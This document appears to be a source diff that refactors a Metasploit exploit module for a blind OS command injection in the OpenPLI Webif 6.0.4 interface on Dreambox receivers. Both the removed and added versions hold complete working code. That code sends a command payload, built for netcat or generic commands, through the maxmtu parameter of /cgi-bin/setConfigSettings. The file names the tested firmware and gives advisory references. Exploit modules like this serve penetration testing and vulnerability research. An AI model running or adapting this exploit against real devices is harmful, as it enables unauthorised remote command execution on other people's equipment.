|
11 | 11 | class Metasploit3 < Msf::Exploit::Remote
|
12 | 12 | Rank = GreatRanking
|
13 | 13 |
|
14 |
| - include Msf::Exploit::Remote::Tcp |
15 | 14 | include Msf::Exploit::Remote::HttpClient
|
16 | 15 |
|
17 | 16 | def initialize(info = {})
|
18 | 17 | super(update_info(info,
|
19 |
| - 'Name' => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution', |
20 |
| - 'Description' => %q{ |
21 |
| - Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection. |
22 |
| -
|
23 |
| - Tested on the following box: |
24 |
| - * Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) |
25 |
| - #1 Wed Aug 17 23:54:07 CEST 2011 |
26 |
| - * Firmware release 1.1.0, 27.01.2013 |
27 |
| - * FP Firmware 1.06 |
28 |
| - * Web Interface 6.0.4-Expert - PLi edition by [lite] |
29 |
| -
|
30 |
| - Note: This is a blind os command injection vulnerability. This means |
31 |
| - that you will not see any output of your command. Try a ping command |
32 |
| - to your local system for a first test. |
| 18 | + 'Name' => 'OpenPLI Webif Arbitrary Command Execution', |
| 19 | + 'Description' => %q{ |
| 20 | + Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command |
| 21 | + injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means |
| 22 | + that you will not see any output of your command. A ping command can be used for |
| 23 | + testing the vulnerability. This module has been tested in a box with the next |
| 24 | + features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 |
| 25 | + Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware |
| 26 | + 1.06 and Web Interface 6.0.4-Expert (PLi edition). |
33 | 27 | },
|
34 |
| - 'Author' => [ 'm-1-k-3' ], |
35 |
| - 'License' => MSF_LICENSE, |
36 |
| - 'References' => |
| 28 | + 'Author' => [ 'm-1-k-3' ], |
| 29 | + 'License' => MSF_LICENSE, |
| 30 | + 'References' => |
37 | 31 | [
|
38 |
| - [ 'URL', 'http://openpli.org/' ], |
39 |
| - [ 'URL', 'http://openpli.org/wiki/Webif' ], |
40 |
| - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ], |
41 |
| - [ 'EDB', '24498' ], |
| 32 | + [ 'OSVDB', '90230' ], |
42 | 33 | [ 'BID', '57943' ],
|
43 |
| - [ 'OSVDB', '90230'] |
| 34 | + [ 'EDB', '24498' ], |
| 35 | + [ 'URL', 'http://openpli.org/wiki/Webif' ], |
| 36 | + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ] |
44 | 37 | ],
|
45 | 38 | 'Platform' => ['unix', 'linux'],
|
46 |
| - 'Arch' => ARCH_CMD, |
47 |
| - 'Privileged' => true, |
48 |
| - 'Payload' => |
| 39 | + 'Arch' => ARCH_CMD, |
| 40 | + 'Privileged' => true, |
| 41 | + 'Payload' => |
49 | 42 | {
|
50 |
| - 'Space' => 1024, |
| 43 | + 'Space' => 1024, |
51 | 44 | 'DisableNops' => true,
|
52 |
| - 'Compat' => |
| 45 | + 'Compat' => |
53 | 46 | {
|
54 | 47 | 'PayloadType' => 'cmd',
|
55 | 48 | 'RequiredCmd' => 'netcat generic'
|
56 | 49 | }
|
57 | 50 | },
|
58 |
| - 'Targets' => |
| 51 | + 'Targets' => |
59 | 52 | [
|
60 | 53 | [ 'Automatic Target', { }]
|
61 | 54 | ],
|
62 | 55 | 'DefaultTarget' => 0,
|
63 | 56 | 'DisclosureDate' => 'Feb 08 2013'
|
64 | 57 | ))
|
65 |
| - |
66 |
| - register_options( |
67 |
| - [ |
68 |
| - Opt::RPORT(80), |
69 |
| - ], self.class) |
70 | 58 | end
|
71 | 59 |
|
72 | 60 | def exploit
|
73 |
| - connect |
74 |
| - |
75 |
| - payl = datastore['PAYLOAD'] |
76 |
| - |
77 |
| - uri = '/cgi-bin/setConfigSettings' |
78 |
| - |
79 |
| - cmd = Rex::Text.uri_encode(payload.encoded) |
80 |
| - |
81 |
| - vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}") |
82 |
| - vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n") |
83 |
| - |
84 |
| - data_cmd = "?maxmtu=1500%26#{cmd}%26" |
85 |
| - |
| 61 | + print_status("#{rhost}:#{rport} - Sending remote command...") |
| 62 | + vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") |
86 | 63 | begin
|
87 |
| - res = send_request_cgi( |
88 |
| - { |
89 |
| - 'uri' => uri << data_cmd, |
| 64 | + send_request_cgi( |
| 65 | + { |
| 66 | + 'uri' => normalize_uri("cgi-bin", "setConfigSettings"), |
90 | 67 | 'method' => 'GET',
|
| 68 | + 'vars_get' => { |
| 69 | + "maxmtu" => "1500&#{payload.encoded}&" |
| 70 | + } |
91 | 71 | })
|
92 | 72 |
|
93 | 73 | rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
94 |
| - print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") |
95 |
| - return |
96 |
| - end |
97 |
| - |
98 |
| - if not res |
99 |
| - print_error("#{rhost}:#{rport} - HTTP Connection Error, Aborting") |
100 |
| - return |
| 74 | + fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") |
101 | 75 | end
|
102 |
| - |
103 |
| - handler |
104 |
| - disconnect |
105 | 76 | end
|
106 | 77 | end
|